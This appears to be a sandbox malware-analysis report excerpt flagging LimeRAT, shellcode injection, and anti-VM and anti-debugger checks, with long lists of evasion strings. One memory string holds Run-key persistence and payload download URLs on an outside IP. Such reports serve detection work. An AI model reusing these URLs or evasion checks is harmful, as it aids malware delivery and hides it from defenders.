Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected LimeRAT

Show sources

Source: Yara match	File source: 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected generic Shellcode Injector

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18316462962.00000138BD524000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18338726635.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18309314406.00000138BD524000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18341553900.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18306268361.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Windows Security Disabler

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: SUPERANTISPYWARE.EXE
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000026.00000003.18311122933.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: API_LOG.DLL
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !E!#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18349219133.00000138BD1CA000.00000004.00000001.sdmp	Binary or memory string: "G!#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	Binary or memory string: "H!#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: DBGHELP.DLLSBIEDLL.DLL
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: OLLYDBGOLLYICEPEDITORLORDPEC32ASMIMPORTREC.EXE
Source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXE
Source: MpSigStub.exe, 00000026.00000003.18333498606.00000138BCD46000.00000004.00000001.sdmp	Binary or memory string: &[!#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	Binary or memory string: $C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18333498606.00000138BCD46000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	Binary or memory string: PTABLE)(LAPTOP)(NOTEBOOK)(SUB NOTEBOOK)%S \%D.%D.%D.%D%04X%04XSBIEDLL.DLLDBGHELP.DLLAPI_LOG.
Source: MpSigStub.exe, 00000026.00000003.18311122933.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: MpSigStub.exe, 00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp	Binary or memory string: BEHAVIORDUMPER.EXE
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLLSBIEDLLX.DLLHTTP://
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	Binary or memory string: \MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: %Z!#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	Binary or memory string: &\MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: QEMU-GA.EXE
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:COPYRENAMED!AUTORUNS.EXE
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	Binary or memory string: \|ACCESSCHK.EXE\|ACCESSCHK64.EXE\|ACCESSENUM.EXE\|ACRORD32.EXE\|ADEXPLORER.EXE\|ADINSIGHT.EXE\|ADRESTORE.EXE\|APPLICATIONFRAMEHOST.EXE\|APPVCLIENT.EXE\|APPVLP.EXE\|ATBROKER.EXE\|AUDIODG.EXE\|AUTORUNS.EXE\|AUTORUNS64.EXE\|AUTORUNSC.EXE\|AUTORUNSC64.EXE\|BASH.EXE\|BGINFO.EXE\|BGINFO64.EXE\|BITSADMIN.EXE\|BROWSER_BROKER.EXE\|CALC.EXE\|CDB.EXE\|CERTUTIL.EXE\|CLOCKRES.EXE\|CLOCKRES64.EXE\|CMD.EXE\|CMDKEY.EXE\|CMSTP.EXE\|CONHOST.EXE\|CONSENT.EXE\|CONTIG.EXE\|CONTIG64.EXE\|CONTROL.EXE\|COREINFO.EXE\|CSC.EXE\|CSCRIPT.EXE\|CSI.EXE\|CSRSS.EXE\|CTFMON.EXE\|CTRL2CAP.EXE\|DASHOST.EXE\|DATAEXCHANGEHOST.EXE\|DBGVIEW.EXE\|DFSVC.EXE\|DISK2VHD.EXE\|DISKEXT.EXE\|DISKEXT64.EXE\|DISKSHADOW.EXE\|DLLHOST.EXE\|DNSCMD.EXE\|DNX.EXE\|DXCAP.EXE\|ESENTUTL.EXE\|EXPAND.EXE\|EXPLORER.EXE\|EXTEXPORT.EXE\|EXTRAC32.EXE\|FINDLINKS.EXE\|FINDLINKS64.EXE\|FINDSTR.EXE\|FONTDRVHOST.EXE\|FORFILES.EXE\|FXSSVC.EXE\|GPSCRIPT.EXE\|GPUP.EXE\|HANDLE.EXE\|HANDLE64.EXE\|HEX2DEC.EXE\|HEX2DEC64.EXE\|HH.EXE\|IE4UINIT.EXE\|IEEXEC.EXE\|INFDEFAULTINSTALL.EXE\|INSTALLUTIL.EXE\|JUNCTION.EXE\|JUNCTION64.EXE\|LDMDUMP.EXE\|LIVEKD.EXE\|LIVEKD64.EXE\|LOADORD.EXE\|LOADORD64.EXE\|LOADORDC.EXE\|LOADORDC64.EXE\|LOCKAPP.EXE\|LOGONSESSIONS.EXE\|LOGONSESSIONS64.EXE\|LSAISO.EXE\|LSASS.EXE\|MAKECAB.EXE\|MAVINJECT.EXE\|MFTRACE.EXE\|MICROSOFTEDGE.EXE\|MICROSOFTEDGECP.EXE\|MICROSOFTEDGESH.EXE\|MSBUILD.EXE\|MSCONFIG.EXE\|MSDEPLOY.EXE\|MSDT.EXE\|MSDTC.EXE\|MSHTA.EXE\|MSIEXEC.EXE\|MSXSL.EXE\|NETSH.EXE\|NLNOTES.EXE\|NLTEST.EXE\|NOTES.EXE\|NOTMYFAULT.EXE\|NOTMYFAULT64.EXE\|NOTMYFAULTC.EXE\|NOTMYFAULTC64.EXE\|NTFSINFO.EXE\|NTFSINFO64.EXE\|NTOSKRNL.EXE\|NVUDISP.EXE\|NVUHDA6.EXE\|ODBCCONF.EXE\|OPENWITH.EXE\|PAGEDFRG.EXE\|PCALUA.EXE\|PCWRUN.EXE\|PENDMOVES.EXE\|PENDMOVES64.EXE\|PIPELIST.EXE\|PIPELIST64.EXE\|POWERSHELL.EXE\|PRESENTATIONHOST.EXE\|PRINT.EXE\|PROCDUMP.EXE\|PROCDUMP64.EXE\|PROCEXP.EXE\|PROCEXP64.EXE\|PROCMON.EXE\|PSEXEC.EXE\|PSEXEC64.EXE\|PSFILE.EXE\|PSFILE64.EXE\|PSGETSID.EXE\|PSGETSID64.EXE\|PSINFO.EXE\|PSINFO64.EXE\|PSKILL.EXE\|PSKILL64.EXE\|PSLIST.EXE\|PSLIST64.EXE\|PSLOGGEDON.EXE\|PSLOGGEDON64.EXE\|PSLOGLIST.EXE\|PSLOGLIST64.EXE\|PSPASSWD.EXE\|PSPASSWD64.EXE\|PSPING.EXE\|PSPING64.EXE\|PSR.EXE\|PSSERVICE.EXE\|PSSERVICE64.EXE\|PSSHUTDOWN.EXE\|PSSUSPEND.EXE\|PSSUSPEND64.EXE\|PWSH.EXE\|RAMMAP.EXE\|RCSI.EXE\|REG.EXE\|REGASM.EXE\|REGDELNULL.EXE\|REGDELNULL64.EXE\|REGEDIT.EXE\|REGISTER-CIMPROVIDER\|REGJUMP.EXE\|REGSVCS.EXE\|REGSVR32.EXE\|REPLACE.EXE\|ROBOCOPY.EXE\|ROCCAT_SWARM.EXE\|RPCPING.EXE\|RUNDLL32.EXE\|RUNONCE.EXE\|RUNSCRIPTHELPER.EXE\|RUNTIMEBROKER.EXE\|SC.EXE\|SCRIPTRUNNER.EXE\|SDELETE.EXE\|SDELETE64.EXE\|SDIAGNHOST.EXE\|SEARCHFILTERHOST.EXE\|SEARCHINDEXER.EXE\|SEARCHPROTOCOLHOST.EXE\|SECURITYHEALTHSERVICE.EXE\|SERVICES.EXE\|SETTINGSYNCHOST.EXE\|SGRMBROKER.EXE\|SIGCHECK.EXE\|SIGCHECK64.EXE\|SIHOST.EXE\|SMARTSCREEN.EXE\|SMSS.EXE\|SPLWOW64.EXE\|SPOOLSV.EXE\|SPPSVC.EXE\|SQLDUMPER.EXE\|SQLPS.EXE\|SQLTOOLSPS.EXE\|STREAMS.EXE\|STREAMS64.EXE\|SURFACECOLORSERVICE.EXE\|SURFACESERVICE.EXE\|SVCHOST.EXE\|SYNCAPPVPUBLISHINGSERVER.EXE\|SYNCHOST.EXE\|SYSMON.EXE\|SYSMON64.EXE\|SYSTEMSETTINGSBROKER.EXE\|TASKHOSTW.EXE\|TASKMGR.EXE\|TCPVCON.EXE\|TCPVIEW.EXE\|TE.EXE\|TRACKER.EXE\|USBINST.EXE\|VBOXDRVINST.EXE\|VMCOMPUTE.EXE\|VMMAP.EXE\|VMMS.EXE\|VSJITD
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: MpSigStub.exe, 00000026.00000003.18349219133.00000138BD1CA000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: SNIFFER.EXE
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: PEBROWSEDBG.EXE
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: IFPROCESSEXISTS("SANDBOXIERPCSS.EXE")ORPROCESSEXISTS("SANDBOXIEDCOMLAUNCH.EXE")THEN
Source: ieinstal.exe, 0000000D.00000002.19665461719.0000000003080000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEUSER32PSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\COCKFIGHT.EXE\FLGEBREVSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNPERAMELINEHTTP://178.32.63.50/MVBS/HOST_HKVPGVGQ234.BINHTTP://178.32.63.50/BVBS/HOST_HKVPGVGQ234.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXE
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXE
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL]
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: $Y!#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: DIR_WATCH.DLL
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	Binary or memory string: *.LOG.\|!\FABRICOBSERVER.EXE
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	Binary or memory string: #I!#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp	Binary or memory string: SANDBOXIERPCSS.EXE
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: "G!#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: AZTEKERNES.exe, 00000005.00000002.15127289168.0000000002BD0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEUSER32PSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=PROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\MSVBVM60.DLL
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !E!#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	Binary or memory string: #I!#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: AZTEKERNES.exe, 00000005.00000002.15127289168.0000000002BD0000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19665461719.0000000003080000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: RC:\PROGRAM FILES\WIRESHARK\WIRESHARK.EXE
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXE
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: SNIFF_HIT.EXE
Source: MpSigStub.exe, 00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp	Binary or memory string: FAKEHTTPSERVER.EXE
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: BSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WIRESHARK.EXE
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE

Tries to detect Any.run

Show sources

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 1936	Thread sleep count: 9975 > 30			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 1936	Thread sleep time: -49875s >= -30000s			Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Window / User API: threadDelayed 9975

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Thread sleep count: Count: 9975 delay: -5

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Code function: 5_2_0040784E rdtsc

5_2_0040784E

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .AVHDX.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: ARM_big_endianARM_legacyARM_unpredictable_16bitmachine_32bitmachineaggressive_trim_wsaggressiveimportamd64_imagearm_imageaslr_bit_setbound_imports_inside_imagebyte_reversed_hibyte_reversed_lowcalls_unimplemented_apichecks_if_debugged_documentedchecks_if_debugged_undocumentedchecks_ntglobalflagchecks_processheapchecks_teb_lasterrorchecks_teb_laststatuscode_on_stackdebug_strippeddeep_analysisdeep_apicall_limitdelay_load_imports_inside_imagedetects_virtualpcdetects_vmdetects_vmwaredirty_wx_branchdisable_apicall_limitdisable_drop_mz_onlydisable_dropper_rescandisable_io_redirectiondisable_microcodedisable_seh_limitdisable_static_unpackingdisable_thread_apicall_limitdisable_vmprotectdmg_decompressdmg_entrypointdmg_filealignmentdmg_imagebasedmg_imagesizedmg_importsdmg_invaliddatadmg_machinedmg_not_executable_imagedmg_notcontiguousdmg_optional_magicdmg_overlapping_sectionsdmg_pointertorawdatadmg_relocationsdmg_resource_levelsdmg_resource_namesdmg_resource_offsetdmg_resource_unordereddmg_sectionalignmentdmg_sizeofheadersdmg_sizeofrawdatadmg_special_sectiondmg_truncateddmg_unsupporteddmg_virtualaddressdmg_virtualsizedroppeddt_continue_after_unpackingdt_continue_after_unpacking_damageddt_error_bb_limitdt_error_failed_to_translatedt_error_heur_API_limitdt_error_heur_exit_criteriadt_error_invalid_opcodedt_error_loop_too_complexdt_error_not_enough_memorydt_error_too_many_operandsdt_error_too_many_prefixesdt_error_vmm_page_faultdynmem_APIcalldynmem_checks_if_debugged_docdynmem_checks_if_debugged_undocdynmem_checks_ntglobalflagdynmem_checks_processheapdynmem_detects_virtualpcdynmem_detects_vmdynmem_detects_vmwaredynmem_kernel_scandynmem_reads_vdll_codedynmem_self_modifying_codedynmem_uses_access_violationdynmem_uses_bound_exceptionsdynmem_uses_breakpointsdynmem_uses_div_by_zerodynmem_uses_int_overflowdynmem_uses_invalid_opcodesdynmem_uses_privinstrdynmem_uses_single_steppingdynmem_uses_udbgrddynmem_uses_udbgwrdynmem_uses_unusual_breakpointenable_binlibenable_lshashenable_vmm_growentrybyte55entrybyte60entrybyte90entrypoint_in_headerentrypoint_in_import_tableepatscnstartepatstartentrysectepatstartlastsectepcallnextepinfirstsectepiniatepoutofimageepscn_eqsizesepscn_falignepscn_islastepscn_valignepscn_vfalignepscn_writableepsec_not_executableexecutable_imageexecutble_imageexecutes_from_dynamic_memoryexecutes_from_last_sectionexecutes_from_resourcesextended_pestaticfirstsectwritableforce_dtforce_expensive_processingforce_unpackinggenpackedhandle_large_vahas_checksumhas_delay_load_importshas_many_resourceshas_msilresourceshasappendeddatahasboundimportshasexportshasstandardentryheaderchecksum0hstr_exhaustiveia64_imageimport_via_tlsinv_argumentsinv_datainv_decompress_errorinv_dos_signatureinv_e_lfanewinv_exportsinv_fileinv_filealignmentinv_filesizeinv_imagebaseinv_nomemoryinv_notimplementedinv_nt_signatureinv_optional_magicinv_overlappinginv_rawoffsetinv_rawsizeinv_readinv_rvainv_sectionalignmentinv_sizeofheadersinv_sizeofimageinv_sizeofoptionalheaderinv_unsupported_mac
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.toc.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: 4ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: VMware_Virtual
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: %ProgramData%\Microsoft\Windows\Hyper-V\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	Binary or memory string: VBoxTrayToolWndClass
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	Binary or memory string: MachineInfo isVirtualMachine
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: % *.bin.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	Binary or memory string: =mQ:#LowFiDetectsVmWare
Source: AZTEKERNES.exe, 00000005.00000002.15128441575.0000000002D39000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	Binary or memory string: \\.\VBoxGuest\\.\VMDRVSYSTEM\CurrentControlSet
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	Binary or memory string: vboxhook.dll
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: vmware-tray.exe
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	Binary or memory string: vmware
